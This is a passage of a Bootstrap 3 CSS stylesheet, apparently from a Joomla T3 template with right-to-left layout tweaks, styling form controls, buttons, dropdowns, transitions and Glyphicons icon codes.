  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  -webkit-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
  -o-transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
  transition: border-color ease-in-out .15s, box-shadow ease-in-out .15s;
}
.form-control:focus {
  border-color: #66afe9;
  outline: 0;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 8px rgba(102, 175, 233, 0.6);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, .075), 0 0 8px rgba(102, 175, 233, 0.6);
}
.form-control::-moz-placeholder {
  color: #999999;
  opacity: 1;
}
.form-control:-ms-input-placeholder {
  color: #999999;
}
.form-control::-webkit-input-placeholder {
  color: #999999;
}
.form-control::-ms-expand {
  background-color: transparent;
  border: 0;
}
.form-control[disabled],
.form-control[readonly],
fieldset[disabled] .form-control {
  background-color: #eeeeee;
  opacity: 1;
}
.form-control[disabled],
fieldset[disabled] .form-control {
  cursor: not-allowed;
}
textarea.form-control {
  height: auto;
}
@media screen and (-webkit-min-device-pixel-ratio: 0) {
  input[type="date"].form-control,
  input[type="time"].form-control,
  input[type="datetime-local"].form-control,
  input[type="month"].form-control {
    line-height: 34px;
  }
  input[type="date"].input-sm,
  input[type="time"].input-sm,
  input[type="datetime-local"].input-sm,
  input[type="month"].input-sm,
  .input-group-sm input[type="date"],
  .input-group-sm input[type="time"],
  .input-group-sm input[type="datetime-local"],
  .input-group-sm input[type="month"] {
    line-height: 30px;
  }
  input[type="date"].input-lg,
  input[type="time"].input-lg,
  input[type="datetime-local"].input-lg,
  input[type="month"].input-lg,
  .input-group-lg input[type="date"],
  .input-group-lg input[type="time"],
  .input-group-lg input[type="datetime-local"],
  .input-group-lg input[type="month"] {
    line-height: 45px;
  }
}
.form-group {
  margin-bottom: 15px;
}
.radio,
.checkbox {
  position: relative;
  display: block;
  margin-top: 10px;
  margin-bottom: 10px;
}
.radio.disabled label,
.checkbox.disabled label,
fieldset[disabled] .radio label,
fieldset[disabled] .checkbox label {
  cursor: not-allowed;
}
.radio label,
.checkbox label {
  min-height: 20px;
  padding-right: 20px;
  margin-bottom: 0;
  font-weight: 400;
  cursor: pointer;
}
.radio input[type="radio"],
.radio-inline input[type="radio"],
.checkbox input[type="checkbox"],
.checkbox-inline input[type="checkbox"] {
  position: absolute;
  margin-top: 4px \9;
  margin-right: -20px;
}
.radio + .radio,
.checkbox + .checkbox {
  margin-top: -5px;
}
.radio-inline,
.checkbox-inline {
  position: relative;
  display: inline-block;
  padding-right: 20px;
  margin-bottom: 0;
  font-weight: 400;
  vertical-align: middle;
  cursor: pointer;
}
.radio-inline.disabled,
.checkbox-inline.disabled,
fieldset[disabled] .radio-inline,
fieldset[disabled] .checkbox-inline {
  cursor: not-allowed;
}
.radio-inline + .radio-inline,
.checkbox-inline + .checkbox-inline {
  margin-top: 0;
  margin-right: 10px;
}
.form-control-static {
  min-height: 34px;
  padding-top: 7px;
  padding-bottom: 7px;
  margin-bottom: 0;
}
.form-control-static.input-lg,
.form-control-static.input-sm {
  padding-left: 0;
  padding-right: 0;
}
.input-sm {
  height: 30px;
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 0;
}
select.input-sm {
  height: 30px;
  line-height: 30px;
}
textarea.input-sm,
select[multiple].input-sm {
  height: auto;
}
.form-group-sm .form-control {
  height: 30px;
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 0;
}
.form-group-sm select.form-control {
  height: 30px;
  line-height: 30px;
}
.form-group-sm textarea.form-control,
.form-group-sm select[multiple].form-control {
  height: auto;
}
.form-group-sm .form-control-static {
  height: 30px;
  min-height: 32px;
  padding: 6px 10px;
  font-size: 12px;
  line-height: 1.5;
}
.input-lg {
  height: 45px;
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
  border-radius: 0;
}
select.input-lg {
  height: 45px;
  line-height: 45px;
}
textarea.input-lg,
select[multiple].input-lg {
  height: auto;
}
.form-group-lg .form-control {
  height: 45px;
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
  border-radius: 0;
}
.form-group-lg select.form-control {
  height: 45px;
  line-height: 45px;
}
.form-group-lg textarea.form-control,
.form-group-lg select[multiple].form-control {
  height: auto;
}
.form-group-lg .form-control-static {
  height: 45px;
  min-height: 38px;
  padding: 11px 16px;
  font-size: 18px;
  line-height: 1.33;
}
.has-feedback {
  position: relative;
}
.has-feedback .form-control {
  padding-left: 42.5px;
}
.form-control-feedback {
  position: absolute;
  top: 0;
  left: 0;
  z-index: 2;
  display: block;
  width: 34px;
  height: 34px;
  line-height: 34px;
  text-align: center;
  pointer-events: none;
}
.input-lg + .form-control-feedback,
.input-group-lg + .form-control-feedback,
.form-group-lg .form-control + .form-control-feedback {
  width: 45px;
  height: 45px;
  line-height: 45px;
}
.input-sm + .form-control-feedback,
.input-group-sm + .form-control-feedback,
.form-group-sm .form-control + .form-control-feedback {
  width: 30px;
  height: 30px;
  line-height: 30px;
}
.has-success .help-block,
.has-success .control-label,
.has-success .radio,
.has-success .checkbox,
.has-success .radio-inline,
.has-success .checkbox-inline,
.has-success.radio label,
.has-success.checkbox label,
.has-success.radio-inline label,
.has-success.checkbox-inline label {
  color: #468847;
}
.has-success .form-control {
  border-color: #468847;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
}
.has-success .form-control:focus {
  border-color: #356635;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #7aba7b;
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #7aba7b;
}
.has-success .input-group-addon {
  color: #468847;
  background-color: #dff0d8;
  border-color: #468847;
}
.has-success .form-control-feedback {
  color: #468847;
}
.has-warning .help-block,
.has-warning .control-label,
.has-warning .radio,
.has-warning .checkbox,
.has-warning .radio-inline,
.has-warning .checkbox-inline,
.has-warning.radio label,
.has-warning.checkbox label,
.has-warning.radio-inline label,
.has-warning.checkbox-inline label {
  color: #c09853;
}
.has-warning .form-control {
  border-color: #c09853;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
}
.has-warning .form-control:focus {
  border-color: #a47e3c;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #dbc59e;
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #dbc59e;
}
.has-warning .input-group-addon {
  color: #c09853;
  background-color: #fcf8e3;
  border-color: #c09853;
}
.has-warning .form-control-feedback {
  color: #c09853;
}
.has-error .help-block,
.has-error .control-label,
.has-error .radio,
.has-error .checkbox,
.has-error .radio-inline,
.has-error .checkbox-inline,
.has-error.radio label,
.has-error.checkbox label,
.has-error.radio-inline label,
.has-error.checkbox-inline label {
  color: #b94a48;
}
.has-error .form-control {
  border-color: #b94a48;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075);
}
.has-error .form-control:focus {
  border-color: #953b39;
  -webkit-box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #d59392;
  box-shadow: inset 0 1px 1px rgba(0, 0, 0, 0.075), 0 0 6px #d59392;
}
.has-error .input-group-addon {
  color: #b94a48;
  background-color: #f2dede;
  border-color: #b94a48;
}
.has-error .form-control-feedback {
  color: #b94a48;
}
.has-feedback label ~ .form-control-feedback {
  top: 25px;
}
.has-feedback label.sr-only ~ .form-control-feedback {
  top: 0;
}
.help-block {
  display: block;
  margin-top: 5px;
  margin-bottom: 10px;
  color: #848484;
}
@media (min-width: 768px) {
  .form-inline .form-group {
    display: inline-block;
    margin-bottom: 0;
    vertical-align: middle;
  }
  .form-inline .form-control {
    display: inline-block;
    width: auto;
    vertical-align: middle;
  }
  .form-inline .form-control-static {
    display: inline-block;
  }
  .form-inline .input-group {
    display: inline-table;
    vertical-align: middle;
  }
  .form-inline .input-group .input-group-addon,
  .form-inline .input-group .input-group-btn,
  .form-inline .input-group .form-control {
    width: auto;
  }
  .form-inline .input-group > .form-control {
    width: 100%;
  }
  .form-inline .control-label {
    margin-bottom: 0;
    vertical-align: middle;
  }
  .form-inline .radio,
  .form-inline .checkbox {
    display: inline-block;
    margin-top: 0;
    margin-bottom: 0;
    vertical-align: middle;
  }
  .form-inline .radio label,
  .form-inline .checkbox label {
    padding-right: 0;
  }
  .form-inline .radio input[type="radio"],
  .form-inline .checkbox input[type="checkbox"] {
    position: relative;
    margin-right: 0;
  }
  .form-inline .has-feedback .form-control-feedback {
    top: 0;
  }
}
.form-horizontal .radio,
.form-horizontal .checkbox,
.form-horizontal .radio-inline,
.form-horizontal .checkbox-inline {
  padding-top: 7px;
  margin-top: 0;
  margin-bottom: 0;
}
.form-horizontal .radio,
.form-horizontal .checkbox {
  min-height: 27px;
}
.form-horizontal .form-group {
  margin-left: -20px;
  margin-right: -20px;
}
@media (min-width: 768px) {
  .form-horizontal .control-label {
    padding-top: 7px;
    margin-bottom: 0;
    text-align: left;
  }
}
.form-horizontal .has-feedback .form-control-feedback {
  left: 20px;
}
@media (min-width: 768px) {
  .form-horizontal .form-group-lg .control-label {
    padding-top: 11px;
    font-size: 18px;
  }
}
@media (min-width: 768px) {
  .form-horizontal .form-group-sm .control-label {
    padding-top: 6px;
    font-size: 12px;
  }
}
.btn {
  display: inline-block;
  margin-bottom: 0;
  font-weight: normal;
  text-align: center;
  white-space: nowrap;
  vertical-align: middle;
  touch-action: manipulation;
  cursor: pointer;
  background-image: none;
  border: 1px solid transparent;
  padding: 6px 12px;
  font-size: 14px;
  line-height: 1.42857143;
  border-radius: 0;
  -webkit-user-select: none;
  -moz-user-select: none;
  -ms-user-select: none;
  user-select: none;
}
.btn:focus,
.btn:active:focus,
.btn.active:focus,
.btn.focus,
.btn:active.focus,
.btn.active.focus {
  outline: 5px auto -webkit-focus-ring-color;
  outline-offset: -2px;
}
.btn:hover,
.btn:focus,
.btn.focus {
  color: #333333;
  text-decoration: none;
}
.btn:active,
.btn.active {
  background-image: none;
  outline: 0;
  -webkit-box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
  box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
}
.btn.disabled,
.btn[disabled],
fieldset[disabled] .btn {
  cursor: not-allowed;
  filter: alpha(opacity=65);
  opacity: 0.65;
  -webkit-box-shadow: none;
  box-shadow: none;
}
a.btn.disabled,
fieldset[disabled] a.btn {
  pointer-events: none;
}
.btn-default {
  color: #333333;
  background-color: #ffffff;
  border-color: #cccccc;
}
.btn-default:focus,
.btn-default.focus {
  color: #333333;
  background-color: #e6e6e6;
  border-color: #8c8c8c;
}
.btn-default:hover {
  color: #333333;
  background-color: #e6e6e6;
  border-color: #adadad;
}
.btn-default:active,
.btn-default.active,
.open > .dropdown-toggle.btn-default {
  color: #333333;
  background-color: #e6e6e6;
  background-image: none;
  border-color: #adadad;
}
.btn-default:active:hover,
.btn-default.active:hover,
.open > .dropdown-toggle.btn-default:hover,
.btn-default:active:focus,
.btn-default.active:focus,
.open > .dropdown-toggle.btn-default:focus,
.btn-default:active.focus,
.btn-default.active.focus,
.open > .dropdown-toggle.btn-default.focus {
  color: #333333;
  background-color: #d4d4d4;
  border-color: #8c8c8c;
}
.btn-default.disabled:hover,
.btn-default[disabled]:hover,
fieldset[disabled] .btn-default:hover,
.btn-default.disabled:focus,
.btn-default[disabled]:focus,
fieldset[disabled] .btn-default:focus,
.btn-default.disabled.focus,
.btn-default[disabled].focus,
fieldset[disabled] .btn-default.focus {
  background-color: #ffffff;
  border-color: #cccccc;
}
.btn-default .badge {
  color: #ffffff;
  background-color: #333333;
}
.btn-primary {
  color: #ffffff;
  background-color: #ff8800;
  border-color: #e67a00;
}
.btn-primary:focus,
.btn-primary.focus {
  color: #ffffff;
  background-color: #cc6d00;
  border-color: #663600;
}
.btn-primary:hover {
  color: #ffffff;
  background-color: #cc6d00;
  border-color: #a85a00;
}
.btn-primary:active,
.btn-primary.active,
.open > .dropdown-toggle.btn-primary {
  color: #ffffff;
  background-color: #cc6d00;
  background-image: none;
  border-color: #a85a00;
}
.btn-primary:active:hover,
.btn-primary.active:hover,
.open > .dropdown-toggle.btn-primary:hover,
.btn-primary:active:focus,
.btn-primary.active:focus,
.open > .dropdown-toggle.btn-primary:focus,
.btn-primary:active.focus,
.btn-primary.active.focus,
.open > .dropdown-toggle.btn-primary.focus {
  color: #ffffff;
  background-color: #a85a00;
  border-color: #663600;
}
.btn-primary.disabled:hover,
.btn-primary[disabled]:hover,
fieldset[disabled] .btn-primary:hover,
.btn-primary.disabled:focus,
.btn-primary[disabled]:focus,
fieldset[disabled] .btn-primary:focus,
.btn-primary.disabled.focus,
.btn-primary[disabled].focus,
fieldset[disabled] .btn-primary.focus {
  background-color: #ff8800;
  border-color: #e67a00;
}
.btn-primary .badge {
  color: #ff8800;
  background-color: #ffffff;
}
.btn-success {
  color: #ffffff;
  background-color: #3e9b52;
  border-color: #378948;
}
.btn-success:focus,
.btn-success.focus {
  color: #ffffff;
  background-color: #2f773f;
  border-color: #122e18;
}
.btn-success:hover {
  color: #ffffff;
  background-color: #2f773f;
  border-color: #255d31;
}
.btn-success:active,
.btn-success.active,
.open > .dropdown-toggle.btn-success {
  color: #ffffff;
  background-color: #2f773f;
  background-image: none;
  border-color: #255d31;
}
.btn-success:active:hover,
.btn-success.active:hover,
.open > .dropdown-toggle.btn-success:hover,
.btn-success:active:focus,
.btn-success.active:focus,
.open > .dropdown-toggle.btn-success:focus,
.btn-success:active.focus,
.btn-success.active.focus,
.open > .dropdown-toggle.btn-success.focus {
  color: #ffffff;
  background-color: #255d31;
  border-color: #122e18;
}
.btn-success.disabled:hover,
.btn-success[disabled]:hover,
fieldset[disabled] .btn-success:hover,
.btn-success.disabled:focus,
.btn-success[disabled]:focus,
fieldset[disabled] .btn-success:focus,
.btn-success.disabled.focus,
.btn-success[disabled].focus,
fieldset[disabled] .btn-success.focus {
  background-color: #3e9b52;
  border-color: #378948;
}
.btn-success .badge {
  color: #3e9b52;
  background-color: #ffffff;
}
.btn-info {
  color: #ffffff;
  background-color: #0099cc;
  border-color: #0086b3;
}
.btn-info:focus,
.btn-info.focus {
  color: #ffffff;
  background-color: #007399;
  border-color: #002633;
}
.btn-info:hover {
  color: #ffffff;
  background-color: #007399;
  border-color: #005875;
}
.btn-info:active,
.btn-info.active,
.open > .dropdown-toggle.btn-info {
  color: #ffffff;
  background-color: #007399;
  background-image: none;
  border-color: #005875;
}
.btn-info:active:hover,
.btn-info.active:hover,
.open > .dropdown-toggle.btn-info:hover,
.btn-info:active:focus,
.btn-info.active:focus,
.open > .dropdown-toggle.btn-info:focus,
.btn-info:active.focus,
.btn-info.active.focus,
.open > .dropdown-toggle.btn-info.focus {
  color: #ffffff;
  background-color: #005875;
  border-color: #002633;
}
.btn-info.disabled:hover,
.btn-info[disabled]:hover,
fieldset[disabled] .btn-info:hover,
.btn-info.disabled:focus,
.btn-info[disabled]:focus,
fieldset[disabled] .btn-info:focus,
.btn-info.disabled.focus,
.btn-info[disabled].focus,
fieldset[disabled] .btn-info.focus {
  background-color: #0099cc;
  border-color: #0086b3;
}
.btn-info .badge {
  color: #0099cc;
  background-color: #ffffff;
}
.btn-warning {
  color: #ffffff;
  background-color: #ff8800;
  border-color: #e67a00;
}
.btn-warning:focus,
.btn-warning.focus {
  color: #ffffff;
  background-color: #cc6d00;
  border-color: #663600;
}
.btn-warning:hover {
  color: #ffffff;
  background-color: #cc6d00;
  border-color: #a85a00;
}
.btn-warning:active,
.btn-warning.active,
.open > .dropdown-toggle.btn-warning {
  color: #ffffff;
  background-color: #cc6d00;
  background-image: none;
  border-color: #a85a00;
}
.btn-warning:active:hover,
.btn-warning.active:hover,
.open > .dropdown-toggle.btn-warning:hover,
.btn-warning:active:focus,
.btn-warning.active:focus,
.open > .dropdown-toggle.btn-warning:focus,
.btn-warning:active.focus,
.btn-warning.active.focus,
.open > .dropdown-toggle.btn-warning.focus {
  color: #ffffff;
  background-color: #a85a00;
  border-color: #663600;
}
.btn-warning.disabled:hover,
.btn-warning[disabled]:hover,
fieldset[disabled] .btn-warning:hover,
.btn-warning.disabled:focus,
.btn-warning[disabled]:focus,
fieldset[disabled] .btn-warning:focus,
.btn-warning.disabled.focus,
.btn-warning[disabled].focus,
fieldset[disabled] .btn-warning.focus {
  background-color: #ff8800;
  border-color: #e67a00;
}
.btn-warning .badge {
  color: #ff8800;
  background-color: #ffffff;
}
.btn-danger {
  color: #ffffff;
  background-color: #cc0000;
  border-color: #b30000;
}
.btn-danger:focus,
.btn-danger.focus {
  color: #ffffff;
  background-color: #990000;
  border-color: #330000;
}
.btn-danger:hover {
  color: #ffffff;
  background-color: #990000;
  border-color: #750000;
}
.btn-danger:active,
.btn-danger.active,
.open > .dropdown-toggle.btn-danger {
  color: #ffffff;
  background-color: #990000;
  background-image: none;
  border-color: #750000;
}
.btn-danger:active:hover,
.btn-danger.active:hover,
.open > .dropdown-toggle.btn-danger:hover,
.btn-danger:active:focus,
.btn-danger.active:focus,
.open > .dropdown-toggle.btn-danger:focus,
.btn-danger:active.focus,
.btn-danger.active.focus,
.open > .dropdown-toggle.btn-danger.focus {
  color: #ffffff;
  background-color: #750000;
  border-color: #330000;
}
.btn-danger.disabled:hover,
.btn-danger[disabled]:hover,
fieldset[disabled] .btn-danger:hover,
.btn-danger.disabled:focus,
.btn-danger[disabled]:focus,
fieldset[disabled] .btn-danger:focus,
.btn-danger.disabled.focus,
.btn-danger[disabled].focus,
fieldset[disabled] .btn-danger.focus {
  background-color: #cc0000;
  border-color: #b30000;
}
.btn-danger .badge {
  color: #cc0000;
  background-color: #ffffff;
}
.btn-link {
  font-weight: 400;
  color: #ff8800;
  border-radius: 0;
}
.btn-link,
.btn-link:active,
.btn-link.active,
.btn-link[disabled],
fieldset[disabled] .btn-link {
  background-color: transparent;
  -webkit-box-shadow: none;
  box-shadow: none;
}
.btn-link,
.btn-link:hover,
.btn-link:focus,
.btn-link:active {
  border-color: transparent;
}
.btn-link:hover,
.btn-link:focus {
  color: #b35f00;
  text-decoration: underline;
  background-color: transparent;
}
.btn-link[disabled]:hover,
fieldset[disabled] .btn-link:hover,
.btn-link[disabled]:focus,
fieldset[disabled] .btn-link:focus {
  color: #999999;
  text-decoration: none;
}
.btn-lg,
.btn-group-lg > .btn {
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
  border-radius: 0;
}
.btn-sm,
.btn-group-sm > .btn {
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 0;
}
.btn-xs,
.btn-group-xs > .btn {
  padding: 1px 5px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 0;
}
.btn-block {
  display: block;
  width: 100%;
}
.btn-block + .btn-block {
  margin-top: 5px;
}
input[type="submit"].btn-block,
input[type="reset"].btn-block,
input[type="button"].btn-block {
  width: 100%;
}
.dropdown-submenu {
  position: relative;
}
.dropdown-submenu > .dropdown-menu {
  top: 0;
  right: 100%;
  margin-top: -5px;
  margin-right: -1px;
}
.dropdown-submenu.open > .dropdown-menu {
  display: block;
}
.dropdown-submenu > .dropdown-menu {
  border-radius: 0;
}
.dropdown-submenu > a:after {
  display: block;
  content: " ";
  float: left;
  width: 0;
  height: 0;
  border-color: transparent;
  border-style: solid;
  border-width: 5px 5px 5px 0;
  border-right-color: #111111;
  margin-top: 5px;
  margin-left: -5px;
}
.dropdown-submenu.open > a:after {
  border-right-color: #ffffff;
}

.fade {
  opacity: 0;
  -webkit-transition: opacity 0.15s linear;
  -o-transition: opacity 0.15s linear;
  transition: opacity 0.15s linear;
}
.fade.in {
  opacity: 1;
}
.collapse {
  display: none;
}
.collapse.in {
  display: block;
}
tr.collapse.in {
  display: table-row;
}
tbody.collapse.in {
  display: table-row-group;
}
.collapsing {
  position: relative;
  height: 0;
  overflow: hidden;
  -webkit-transition-property: height, visibility;
  transition-property: height, visibility;
  -webkit-transition-duration: 0.35s;
  transition-duration: 0.35s;
  -webkit-transition-timing-function: ease;
  transition-timing-function: ease;
}
@font-face {
  font-family: "Glyphicons Halflings";
  src: url("../../../../../plugins/system/t3/base-bs3/bootstrap/fonts/glyphicons-halflings-regular.eot");
  src: url("../../../../../plugins/system/t3/base-bs3/bootstrap/fonts/glyphicons-halflings-regular.eot?#iefix") format("embedded-opentype"), url("../../../../../plugins/system/t3/base-bs3/bootstrap/fonts/glyphicons-halflings-regular.woff2") format("woff2"), url("../../../../../plugins/system/t3/base-bs3/bootstrap/fonts/glyphicons-halflings-regular.woff") format("woff"), url("../../../../../plugins/system/t3/base-bs3/bootstrap/fonts/glyphicons-halflings-regular.ttf") format("truetype"), url("../../../../../plugins/system/t3/base-bs3/bootstrap/fonts/glyphicons-halflings-regular.svg#glyphicons_halflingsregular") format("svg");
}
.glyphicon {
  position: relative;
  top: 1px;
  display: inline-block;
  font-family: "Glyphicons Halflings";
  font-style: normal;
  font-weight: 400;
  line-height: 1;
  -webkit-font-smoothing: antialiased;
  -moz-osx-font-smoothing: grayscale;
}
.glyphicon-asterisk:before {
  content: "\002a";
}
.glyphicon-plus:before {
  content: "\002b";
}
.glyphicon-euro:before,
.glyphicon-eur:before {
  content: "\20ac";
}
.glyphicon-minus:before {
  content: "\2212";
}
.glyphicon-cloud:before {
  content: "\2601";
}
.glyphicon-envelope:before {
  content: "\2709";
}
.glyphicon-pencil:before {
  content: "\270f";
}
.glyphicon-glass:before {
  content: "\e001";
}
.glyphicon-music:before {
  content: "\e002";
}
.glyphicon-search:before {
  content: "\e003";
}
.glyphicon-heart:before {
  content: "\e005";
}
.glyphicon-star:before {
  content: "\e006";
}
.glyphicon-star-empty:before {
  content: "\e007";
}
.glyphicon-user:before {
  content: "\e008";
}
.glyphicon-film:before {
  content: "\e009";
}
.glyphicon-th-large:before {
  content: "\e010";
}
.glyphicon-th:before {
  content: "\e011";
}
.glyphicon-th-list:before {
  content: "\e012";
}
.glyphicon-ok:before {
  content: "\e013";
}
.glyphicon-remove:before {
  content: "\e014";
}
.glyphicon-zoom-in:before {
  content: "\e015";
}
.glyphicon-zoom-out:before {
  content: "\e016";
}
.glyphicon-off:before {
  content: "\e017";
}
.glyphicon-signal:before {
  content: "\e018";
}
.glyphicon-cog:before {
  content: "\e019";
}
.glyphicon-trash:before {
  content: "\e020";
}
.glyphicon-home:before {
  content: "\e021";
}
.glyphicon-file:before {
  content: "\e022";
}
.glyphicon-time:before {
  content: "\e023";
}
.glyphicon-road:before {
  content: "\e024";
}
.glyphicon-download-alt:before {
  content: "\e025";
}
.glyphicon-download:before {
  content: "\e026";
}
.glyphicon-upload:before {
  content: "\e027";
}
.glyphicon-inbox:before {
  content: "\e028";
}
.glyphicon-play-circle:before {
  content: "\e029";
}
.glyphicon-repeat:before {
  content: "\e030";
}
.glyphicon-refresh:before {
  content: "\e031";
}
.glyphicon-list-alt:before {
  content: "\e032";
}
.glyphicon-lock:before {
  content: "\e033";
}
.glyphicon-flag:before {
  content: "\e034";
}
.glyphicon-headphones:before {
  content: "\e035";
}
.glyphicon-volume-off:before {
  content: "\e036";
}
.glyphicon-volume-down:before {
  content: "\e037";
}
.glyphicon-volume-up:before {
  content: "\e038";
}
.glyphicon-qrcode:before {
  content: "\e039";
}
.glyphicon-barcode:before {
  content: "\e040";
}
.glyphicon-tag:before {
  content: "\e041";
}
.glyphicon-tags:before {
  content: "\e042";
}
.glyphicon-book:before {
  content: "\e043";
}
.glyphicon-bookmark:before {
  content: "\e044";
}
.glyphicon-print:before {
  content: "\e045";
}
.glyphicon-camera:before {
  content: "\e046";
}
.glyphicon-font:before {
  content: "\e047";
}
.glyphicon-bold:before {
  content: "\e048";
}
.glyphicon-italic:before {
  content: "\e049";
}
.glyphicon-text-height:before {
  content: "\e050";
}
.glyphicon-text-width:before {
  content: "\e051";
}
.glyphicon-align-left:before {
  content: "\e052";
}
.glyphicon-align-center:before {
  content: "\e053";
}
.glyphicon-align-right:before {
  content: "\e054";
}
.glyphicon-align-justify:before {
  content: "\e055";
}
.glyphicon-list:before {
  content: "\e056";
}
.glyphicon-indent-left:before {
  content: "\e057";
}
.glyphicon-indent-right:before {
  content: "\e058";
}
.glyphicon-facetime-video:before {
  content: "\e059";
}
.glyphicon-picture:before {
  content: "\e060";
}
.glyphicon-map-marker:before {
  content: "\e062";
}
.glyphicon-adjust:before {
  content: "\e063";
}
.glyphicon-tint:before {
  content: "\e064";
}
.glyphicon-edit:before {
  content: "\e065";
}
.glyphicon-share:before {
  content: "\e066";
}
.glyphicon-check:before {
  content: "\e067";
}
.glyphicon-move:before {
  content: "\e068";
}
.glyphicon-step-backward:before {
  content: "\e069";
}
.glyphicon-fast-backward:before {
  content: "\e070";
}
.glyphicon-backward:before {
  content: "\e071";
}
.glyphicon-play:before {
  content: "\e072";
}
.glyphicon-pause:before {
  content: "\e073";
}
.glyphicon-stop:before {
  content: "\e074";
}
.glyphicon-forward:before {
  content: "\e075";
}
.glyphicon-fast-forward:before {
  content: "\e076";
}
.glyphicon-step-forward:before {
  content: "\e077";
}
.glyphicon-eject:before {
  content: "\e078";
}
.glyphicon-chevron-left:before {
  content: "\e079";
}
.glyphicon-chevron-right:before {
  content: "\e080";
}
.glyphicon-plus-sign:before {
  content: "\e081";
}
.glyphicon-minus-sign:before {
  content: "\e082";
}
.glyphicon-remove-sign:before {
  content: "\e083";
}
.glyphicon-ok-sign:before {
  content: "\e084";
}
.glyphicon-question-sign:before {
  content: "\e085";
}
.glyphicon-info-sign:before {
  content: "\e086";
}
.glyphicon-screenshot:before {
  content: "\e087";
}
.glyphicon-remove-circle:before {
  content: "\e088";
}
.glyphicon-ok-circle:before {
  content: "\e089";
}
.glyphicon-ban-circle:before {
  content: "\e090";
}
.glyphicon-arrow-left:before {
  content: "\e091";
}
.glyphicon-arrow-right:before {
  content: "\e092";
}
.glyphicon-arrow-up:before {
  content: "\e093";
}
.glyphicon-arrow-down:before {
  content: "\e094";
}
.glyphicon-share-alt:before {
  content: "\e095";
}
.glyphicon-resize-full:before {
  content: "\e096";
}
.glyphicon-resize-small:before {
  content: "\e097";
}
.glyphicon-exclamation-sign:before {
  content: "\e101";
}
.glyphicon-gift:before {
  content: "\e102";
}
.glyphicon-leaf:before {
  content: "\e103";
}
.glyphicon-fire:before {
  content: "\e104";
}
.glyphicon-eye-open:before {
  content: "\e105";
}
.glyphicon-eye-close:before {
  content: "\e106";
}
.glyphicon-warning-sign:before {
  content: "\e107";
}
.glyphicon-plane:before {
  content: "\e108";
}
.glyphicon-calendar:before {
  content: "\e109";
}
.glyphicon-random:before {
  content: "\e110";
}
.glyphicon-comment:before {
  content: "\e111";
}
.glyphicon-magnet:before {
  content: "\e112";
}
.glyphicon-chevron-up:before {
  content: "\e113";
}
.glyphicon-chevron-down:before {
  content: "\e114";
}
.glyphicon-retweet:before {
  content: "\e115";
}
.glyphicon-shopping-cart:before {
  content: "\e116";
}
.glyphicon-folder-close:before {
  content: "\e117";
}
.glyphicon-folder-open:before {
  content: "\e118";
}
.glyphicon-resize-vertical:before {
  content: "\e119";
}
.glyphicon-resize-horizontal:before {
  content: "\e120";
}
.glyphicon-hdd:before {
  content: "\e121";
}
.glyphicon-bullhorn:before {
  content: "\e122";
}
.glyphicon-bell:before {
  content: "\e123";
}
.glyphicon-certificate:before {
  content: "\e124";
}
.glyphicon-thumbs-up:before {
  content: "\e125";
}
.glyphicon-thumbs-down:before {
  content: "\e126";
}
.glyphicon-hand-right:before {
  content: "\e127";
}
.glyphicon-hand-left:before {
  content: "\e128";
}
.glyphicon-hand-up:before {
  content: "\e129";
}
.glyphicon-hand-down:before {
  content: "\e130";
}
.glyphicon-circle-arrow-right:before {
  content: "\e131";
}
.glyphicon-circle-arrow-left:before {
  content: "\e132";
}
.glyphicon-circle-arrow-up:before {
  content: "\e133";
}
.glyphicon-circle-arrow-down:before {
  content: "\e134";
}
.glyphicon-globe:before {
  content: "\e135";
}
.glyphicon-wrench:before {
  content: "\e136";
}
.glyphicon-tasks:before {
  content: "\e137";
}
.glyphicon-filter:before {
  content: "\e138";
}
.glyphicon-briefcase:before {
  content: "\e139";
}
.glyphicon-fullscreen:before {
  content: "\e140";
}
.glyphicon-dashboard:before {
  content: "\e141";
}
.glyphicon-paperclip:before {
  content: "\e142";
}
.glyphicon-heart-empty:before {
  content: "\e143";
}
.glyphicon-link:before {
  content: "\e144";
}
.glyphicon-phone:before {
  content: "\e145";
}
.glyphicon-pushpin:before {
  content: "\e146";
}
.glyphicon-usd:before {
  content: "\e148";
}
.glyphicon-gbp:before {
  content: "\e149";
}
.glyphicon-sort:before {
  content: "\e150";
}
.glyphicon-sort-by-alphabet:before {
  content: "\e151";
}
.glyphicon-sort-by-alphabet-alt:before {
  content: "\e152";
}
.glyphicon-sort-by-order:before {
  content: "\e153";
}
.glyphicon-sort-by-order-alt:before {
  content: "\e154";
}
.glyphicon-sort-by-attributes:before {
  content: "\e155";
}
.glyphicon-sort-by-attributes-alt:before {
  content: "\e156";
}
.glyphicon-unchecked:before {
  content: "\e157";
}
.glyphicon-expand:before {
  content: "\e158";
}
.glyphicon-collapse-down:before {
  content: "\e159";
}
.glyphicon-collapse-up:before {
  content: "\e160";
}
.glyphicon-log-in:before {
  content: "\e161";
}
.glyphicon-flash:before {
  content: "\e162";
}
.glyphicon-log-out:before {
  content: "\e163";
}
.glyphicon-new-window:before {
  content: "\e164";
}
.glyphicon-record:before {
